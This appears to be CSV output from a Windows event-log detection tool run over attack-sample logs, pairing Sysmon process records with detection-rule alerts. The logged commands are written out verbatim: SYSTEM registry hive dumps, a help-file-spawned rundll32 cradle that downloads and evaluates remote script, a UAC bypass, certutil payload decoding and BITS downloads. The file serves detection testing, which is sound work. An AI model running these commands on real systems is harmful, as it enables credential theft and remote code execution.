Data,,rules/sigma/process_creation_sysmon/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.202 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-DD9F-5D31-0000-00102D4D4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.202 +00:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation_sysmon/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.202 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.233 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-DD9F-5D31-0000-001041504B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.233 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.258 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | LID: 0x50951 | PID: 6536 | PGUID: 747F3D96-DD9F-5D31-0000-00108D524B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.258 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:50.764 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x509ff | PID: 3952 | PGUID: 747F3D96-DDB6-5D31-0000-0010273D4C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:12:05.755 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x509ff | PID: 2156 | PGUID: 747F3D96-DDC5-5D31-0000-0010A3414D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-26 07:39:14.375 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | Process: C:\Windows\hh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf99eb | PID: 1504 | PGUID: 747F3D96-AE22-5D3A-0000-001096B24E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 07:39:14.375 +00:00,MSEDGEWIN10,1,high,Evas,HH.exe Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 07:39:14.935 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | LID: 0xf99eb | PID: 5548 | PGUID: 747F3D96-AE22-5D3A-0000-001004D84E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 07:39:14.935 +00:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation_sysmon/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 07:39:14.935 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 07:39:14.935 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 07:39:14.935 +00:00,MSEDGEWIN10,1,high,Evas | Exec,HTML Help Shell Spawn,,rules/sigma/process_creation_sysmon/proc_creation_win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-27 22:43:41.424 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | Process: C:\Users\IEUser\Downloads\UACBypass.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x235cdd | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:41.424 +00:00,MSEDGEWIN10,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:41.755 +00:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32 | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:41.755 +00:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\winSAT.exe | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:41.755 +00:00,MSEDGEWIN10,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:41.757 +00:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\WINMM.dll | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:42.033 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235cdd | PID: 7128 | PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:42.033 +00:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:42.033 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\UACBypass.exe | Tgt Process: C:\Windows \System32\winSAT.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6632 | Src PGUID: 747F3D96-D39D-5D3C-0000-001026F55500 | Tgt PID: 7128 | Tgt PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:42.161 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6820 324 0000022557280720 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4028 | PGUID: 747F3D96-D39E-5D3C-0000-0010EF395600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:42.392 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235bee | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:42.392 +00:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:42.938 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:43.016 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Image: C:\Windows \System32\WINMM.dll | Process: C:\Windows \System32\winSAT.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-29 21:11:11.156 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Invoice@0582.cpl | Process: C:\Windows\Explorer.EXE | PID: 4600 | PGUID: 747F3D96-6056-5D3F-0000-0010C9EF4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-29 21:11:17.364 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x4131b5 | PID: 4996 | PGUID: 747F3D96-60F5-5D3F-0000-0010A7B65500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-29 21:11:17.587 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4356 | PGUID: 747F3D96-60F5-5D3F-0000-0010D1CF5500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-29 21:11:17.587 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-29 21:11:17.621 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4884 | PGUID: 747F3D96-60F5-5D3F-0000-0010A8D75500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-29 21:11:17.621 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-29 21:11:19.098 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt | Process: C:\Windows\SysWOW64\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 6160 | PGUID: 747F3D96-60F7-5D3F-0000-00106F2F5600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-29 21:11:19.098 +00:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-29 21:32:55.583 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6336 362 00000298E04230D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6424 | PGUID: 747F3D96-6607-5D3F-0000-0010B3818500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:32:57.633 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x413182 | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:32:58.659 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3184 | PGUID: 747F3D96-660A-5D3F-0000-0010B9E08500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:32:58.659 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:32:58.711 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2576 | PGUID: 747F3D96-660A-5D3F-0000-001048E58500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:32:59.234 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | LID: 0x413182 | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:32:59.234 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:32:59.582 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\AllTheThings.dll | Process: C:\Windows\system32\certutil.exe | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.193 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-660F-5D3F-0000-00109B328600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.254 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2948 | PGUID: 747F3D96-660F-5D3F-0000-001055378600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.254 +00:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.886 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | LID: 0x413182 | PID: 3896 | PGUID: 747F3D96-660F-5D3F-0000-00100F4F8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.886 +00:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation_sysmon/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.966 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | LID: 0x413182 | PID: 6720 | PGUID: 747F3D96-660F-5D3F-0000-00106B508600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.966 +00:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.966 +00:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.966 +00:00,MSEDGEWIN10,1,high,Evas | Persis,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:04.008 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3756 | PGUID: 747F3D96-660F-5D3F-0000-00104D5B8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:08.202 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= 